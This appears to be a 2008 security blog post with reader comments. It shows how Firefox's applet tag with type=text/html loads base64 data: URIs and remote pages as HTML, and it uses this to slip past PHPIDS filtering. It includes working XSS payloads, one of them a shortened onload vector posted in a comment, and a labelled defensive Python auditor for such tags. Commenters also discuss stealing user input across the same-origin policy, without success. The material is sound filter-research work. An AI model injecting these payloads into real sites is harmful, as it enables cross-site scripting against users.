Firefox applet fun
Tuesday, 20 May 2008
I’ve been hacking on PHPIDS recently and wanted a pure XSS vector, not just script execution. I decided to experiment with the applet tag because it sneaks past the malicious tag detection, and I wondered whether it accepts the type attribute like the object tag does….
<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>
That works: it executes the base64-encoded string as HTML! It doesn’t stop there though.
<applet src="http://www.businessinfo.co.uk" type=text/html>
The applet tag even acts like an iframe.
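To show the defensive side of this, here is an added example (my own code, not part of the original post or of PHPIDS) that parses an HTML fragment with Python’s standard HTMLParser and reports why each applet tag looks like an HTML or frame loader: a src that is a data: URI (decoded so the embedded markup becomes visible), a type of text/html, a remote src, or an inline event handler. The SAMPLES list, the function names decode_data_uri and audit_applets, and the benign Clock.class applet are all constructed for this example.

```python
import base64
import re
from html.parser import HTMLParser

# Constructed samples: the post's two vectors, a condensed variant, and a benign Java applet.
SAMPLES = [
    '<applet src="data:text/html;base64,PHNjcmlwdD5hbGVydCgvWFNTLyk8L3NjcmlwdD4" type=text/html>',
    '<applet src="http://www.businessinfo.co.uk" type=text/html></applet>',
    '<applet/src/type=text/html onload=alert(1)>',
    '<applet code="Clock.class" width=100 height=100></applet>',
]

def decode_data_uri(value):
    # Payload of a data: URI (base64 or plain); None if not a data: URI or undecodable.
    m = re.match(r"data:[^;,]*(;base64)?,(.*)", value, re.S | re.I)
    if m is None or m.group(1) is None:
        return m and m.group(2)
    try:
        # Browsers accept unpadded base64; b64decode does not, so restore the padding.
        return base64.b64decode(m.group(2) + "=" * (-len(m.group(2)) % 4)).decode("utf-8", "replace")
    except ValueError:
        return None

class AppletAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # one reason list per suspicious <applet>

    def handle_starttag(self, tag, attrs):
        reasons = []
        for name, value in (attrs if tag == "applet" else ()):  # names arrive lowercased, quotes stripped
            value = (value or "").strip()
            if name == "type" and value.lower().startswith("text/html"):
                reasons.append("type=text/html")
            elif name == "src" and value.lower().startswith("data:"):
                embedded = (decode_data_uri(value) or "").lower()
                reasons.append("src=data: URI" + (" carrying <script>" if "<script" in embedded else ""))
            elif name == "src":
                reasons.append("src=" + (value or "(empty)"))
            elif name.startswith("on"):
                reasons.append("event handler " + name)
        if reasons:
            self.findings.append(reasons)

def audit_applets(fragment):
    auditor = AppletAuditor()
    auditor.feed(fragment)
    auditor.close()
    return auditor.findings
```

Running audit_applets over each entry of SAMPLES flags the first three and returns an empty list for the plain Java applet, which is the distinction an input filter needs: applet tags are only dangerous here when they carry src, type or an event handler.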
No. 1 — May 20th, 2008 at 10:49 am
hey man, nice find.
No. 2 — May 20th, 2008 at 11:17 am
@ehmo
Thx, it was fun to find
No. 3 — May 20th, 2008 at 12:07 pm
Here’s a shortened XSS vector:
<applet/src/type=text/html onload=alert(1)
No. 4 — May 20th, 2008 at 12:50 pm
My only issue would be sites that use strict XHTML, this would be rendered useless, no?
No. 5 — May 20th, 2008 at 12:56 pm
@daniel
I ran a test in strict html and it still seemed to work
No. 6 — May 20th, 2008 at 1:37 pm
interesting, damn good find then sir!
No. 7 — May 20th, 2008 at 2:47 pm
Which version of Firefox did you use? I tried it with Firefox 3 RC1 and it didn’t work.
No. 8 — May 20th, 2008 at 2:50 pm
@Alex
Not tried with beta but it works with latest FF2
No. 9 — May 20th, 2008 at 6:50 pm
I’ve tested it with the latest FF2. Now it works.
It’s time to try accessing any property or value from outside that “iframe”. Maybe we can bypass the same origin policy and steal userinput from within this “iframe”.
No. 10 — May 20th, 2008 at 6:57 pm
@Alex
Yeah I thought that might be possible but it appears that the properties can’t be accessed using “this” and the frames array. However if you can prove me wrong then I’d be very interested in how to do it
No. 11 — May 20th, 2008 at 10:16 pm
I’ve tried some code to access data from within this “iframe”, but you’re right so far. ’til now I didn’t manage to get around the protection.
No. 12 — May 21st, 2008 at 9:19 am
Nice stuff Gareth – finally a “real” XSS again
Has been a pretty long time. The issues are fixed in the trunk – 0.4.8 as soon as I return from OWASP Europe.
No. 13 — May 21st, 2008 at 9:59 am
@.mario
Thx, I knew about the applet tag insert for a while but I didn’t think it was exploitable. It was good fun to find
good luck with the conference